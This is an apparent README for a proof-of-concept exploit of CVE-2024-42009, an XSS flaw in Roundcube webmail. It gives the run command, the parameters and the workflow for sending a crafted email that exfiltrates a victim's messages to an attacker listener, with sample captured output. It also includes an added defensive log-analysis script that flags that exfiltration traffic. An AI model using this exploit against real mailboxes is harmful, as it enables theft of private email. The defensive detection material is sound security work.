CVE-2024-42009 PoC — Roundcube Webmail Security Vulnerability

Associated Vulnerability
Title: Roundcube Webmail Security Vulnerability (CVE-2024-42009)
Description: A Cross-Site Scripting vulnerability in Roundcube through 1.5.7 and 1.6.x through 1.6.7 allows a remote attacker to steal and send emails of a victim via a crafted e-mail message that abuses a Desanitization issue in message_body() in program/actions/mail/show.php.
Readme
# CVE-2024-42009 PoC: Email Capture Listener & XSS Exploit

## Overview
This Proof of Concept (PoC) demonstrates an exploit for CVE-2024-42009, leveraging a cross-site scripting (XSS) vulnerability to extract emails from a target webmail application. The attack injects a malicious payload that exfiltrates email content to an attacker-controlled listener.

## Features
- Exploits an XSS vulnerability to capture email contents.
- Uses an HTTP listener to receive and decode exfiltrated emails.
- Automates payload injection and exfiltration.

## Requirements
- Python 3.x
- Required dependencies (install via pip):
  ```sh
  pip install requests beautifulsoup4
  ```

## Usage
Run the script with the necessary arguments:

```sh
python exploit.py -fu attacker@example.com -tu victim@example.com -u http://target.com/contact -ip YOUR_IP -p 1337
```

### Parameters
| Argument | Description |
|----------|-------------|
| `-fu`, `--from-user` | The sender's email address |
| `-tu`, `--to-user` | The recipient's email address |
| `-u`, `--target-url` | The target webmail URL |
| `-ip`, `--server-ip` | The attacker's listener IP address |
| `-p`, `--server-port` | The port for the listener (default: 1337) |

## Attack Workflow
1. **Start Listener**: The script starts an HTTP server to capture extracted emails.
2. **Inject Malicious Payload**: The XSS payload is sent via a crafted email.
3. **Trigger Execution**: When the victim opens the email, the payload executes and sends the email content to the attacker's server.
4. **Capture & Decode**: The extracted email content is decoded and displayed.
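
Seen from the defender's side, step 3 is an outbound HTTP request from the victim's browser to a bare IP address and port shortly after a message is opened in webmail. The following Python sketch is an added example, not part of the PoC repository: it flags that pattern in forward-proxy logs. The log format, the hostname `webmail.example.org`, the 30-second window and every sample line are constructed assumptions.

```python
import ipaddress
from datetime import datetime, timedelta
from urllib.parse import urlsplit

WEBMAIL_HOST = "webmail.example.org"  # assumption: your Roundcube hostname
WINDOW = timedelta(seconds=30)        # assumption: correlation window
USUAL_PORTS = {80, 443}

# Constructed proxy log lines (time-ordered): "<ISO time> <client> <method> <url>"
SAMPLE_LOG = """\
2024-08-10T09:00:01 10.0.0.21 GET https://webmail.example.org/?_task=mail&_action=show&_uid=1
2024-08-10T09:00:03 10.0.0.21 POST http://203.0.113.7:1337/
2024-08-10T09:00:04 10.0.0.22 GET http://203.0.113.9:8080/status
2024-08-10T09:05:00 10.0.0.21 GET http://203.0.113.7:1337/
2024-08-10T09:06:00 10.0.0.23 GET https://webmail.example.org/?_task=mail&_action=show&_uid=4
2024-08-10T09:06:02 10.0.0.23 GET https://cdn.example.net/logo.png
"""

def is_ip_literal_odd_port(url):
    """True when the URL host is an IP literal and the port is not 80/443."""
    parts = urlsplit(url)
    try:
        ipaddress.ip_address(parts.hostname or "")
    except ValueError:
        return False  # a DNS name, not an IP literal
    port = parts.port or (443 if parts.scheme == "https" else 80)
    return port not in USUAL_PORTS

def find_suspect_egress(log_text):
    """Return (client, url, time) for odd egress soon after a webmail request."""
    last_webmail = {}  # client -> time of that client's latest webmail request
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, _method, url = line.split(maxsplit=3)
        when = datetime.fromisoformat(ts)
        if urlsplit(url).hostname == WEBMAIL_HOST:
            last_webmail[client] = when
        elif is_ip_literal_odd_port(url):
            seen = last_webmail.get(client)
            if seen is not None and when - seen <= WINDOW:
                hits.append((client, url, ts))
    return hits

if __name__ == "__main__":
    for hit in find_suspect_egress(SAMPLE_LOG):
        print("suspect egress after webmail view:", hit)
```

This is a triage heuristic: it misses exfiltration to a hostname or to port 80/443, and a hit still needs to be checked against the message the client opened at that time.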

## Example Output
```
[*] CVE-2024-42009 PoC: Listening on 192.168.1.100:1337...
[*] Sending payload for UID 1...
[+] Payload sent for UID 1 (Status: 200)

[+] Captured Email Content:
Hello, this is a test email!
```

## Disclaimer
This PoC is for educational and research purposes only. Unauthorized testing against systems without consent is illegal. Use responsibly!
